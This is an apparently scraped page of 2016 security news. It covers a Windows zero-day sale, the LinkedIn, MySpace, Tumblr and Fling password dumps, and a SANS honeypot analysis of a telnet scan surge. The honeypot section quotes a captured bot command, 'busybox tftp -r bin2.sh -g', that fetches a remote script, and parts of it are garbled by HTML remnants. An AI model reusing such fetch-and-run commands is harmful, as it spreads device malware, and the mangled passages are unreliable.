(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Softpedia News

Windows Zero-Day Affecting All OS Versions on Sale for $90000
Softpedia News
A hacker going by the handle BuggiCorp is selling a zero-day vulnerability affecting all Windows OS versions that can allow an attacker to elevate privileges for software processes to the highest level available in Windows, known as SYSTEM. Security ...

and more »

(credit: CBS)

Less than two weeks after more than 177 million LinkedIn user passwords surfaced, security researchers have discovered three more breaches involving MySpace, Tumblr, and dating website Fling that all told bring the total number of compromised accounts to more than 642 million.

"Any one of these 4 I'm going to talk about on their own would be notable, but to see a cluster of them appear together is quite intriguing," security researcher Troy Hunt observed on Monday. The cluster involves breaches known to have happened to Fling in 2011, to LinkedIn in 2012, and to Tumblr 2013. It's still not clear when the MySpace hack took place, but Hunt, operator of the Have I been pwned? breach notification service, said it surely happened sometime after 2007 and before 2012. He continued:

There are some really interesting patterns emerging here. One is obviously the age; the newest breach of this recent spate is still more than 3 years old. This data has been lying dormant (or at least out of public sight) for long periods of time.

The other is the size and these 4 breaches are all in the top 5 largest ones HIBP has ever seen. That's out of 109 breaches to date, too. Not only that, but these 4 incidents account for two thirds of all the data in the system, or least they will once MySpace turns up.

Then there's the fact that it's all appearing within a very short period of time - all just this month. There's been some catalyst that has brought these breaches to light and to see them all fit this mould and appear in such a short period of time, I can't help but wonder if they're perhaps related.

All four of the password dumps are being sold on a darkweb forum by peace_of_mind, a user with 24 positive feedback ratings, two neutral ratings, and zero negative ratings. That's an indication the unknown person isn't exaggerating the quality of the data. The megabreach trend is troubling for at least a couple of reasons. First, it demonstrates that service providers are either unable to detect breaches or are willing to keep them secret years after they're discovered. Second, it raises the unsettling question where the trend will end, and if additional breaches are in store before we get there?

Read 2 remaining paragraphs | Comments

FreeBSD Security Advisory FreeBSD-SA-16:22.libarchive
FreeBSD Security Advisory FreeBSD-SA-16:20.linux

Update: I extracted a sample pcap. The target IP (honeypot) is replaced with The odd thing about these connections is that they are not only all blind, but they dont really send a password. Also, according to my version of Wireshark, the telnet traffic is initially malformed. Maybe a telnet exploit? click here for the pcap file

Some readers noted that over the weekend, %%port:23%% scans were up significantly. I just took a quick look at our honeypot, and don" />

Typically, a sharpincrease in the number of source IPs indicates some type of worm that uses vulnerable systems to scan for more victims after it infects them.

The main target of telnet scans are usually" />For the honeypot, I setup traffic captures collection 100MB">tshark -r telnet -n -Y telnet.data tcp.len1busybox tftp -r bin2.sh -g 149">------

As you can see, they all follow the standard pattern" />p0f can give us a quick breakdown of operating systems for the collected traffic. Pretty much all of the hits come from Linux. Out of the about 1 million p0f records, we got less then 200 that indicate an operating system other then Linux.

So in conclusion: Not sure what causes the significant increase, but I doubt that it is anything fundamentally different from what we have seen before. Keep your telnet servers contained (or turned off) and dont use default passwords.

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
FreeBSD Security Advisory FreeBSD-SA-16:23.libarchive
FreeBSD Security Advisory FreeBSD-SA-16:21.43bsd

Softpedia News

Most Laptop Vendors Distribute Bloatware Full of Critical Security Bugs
Softpedia News
What the Duo team discovered is that many laptop and notebook OEMs (Original Equipment Manufacturers) have hastily put together these programs, which at a closer look from trained infosec experts prove to be riddled with a large number of security ...
PC makers blasted for bad bloatware securityiT News

all 22 news articles »

New SANS Institute Incident Response Survey Finds Malware, Unauthorized Access And APTs Lead Attacks
SYS-CON Media (press release)
SANS offers a myriad of free resources to the InfoSec community including consensus projects, research reports, and newsletters; it also operates the Internet's early warning system--the Internet Storm Center. At the heart of SANS are the many security ...

and more »
[RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow
[RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor
[RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution
[slackware-security] mozilla-thunderbird (SSA:2016-152-02)
[slackware-security] imagemagick (SSA:2016-152-01)

iT News (blog)

Respect my Certificate Authority!
iT News (blog)
When infosec equipment vendor Blue Coat was issued an intermediate Certificate Authority (CA) signed by Symantec, not only did it create an uproar in the security industry, but it also (again) raised the question of why we're still using CAs. Blue Coat ...

Internet Storm Center Infocon Status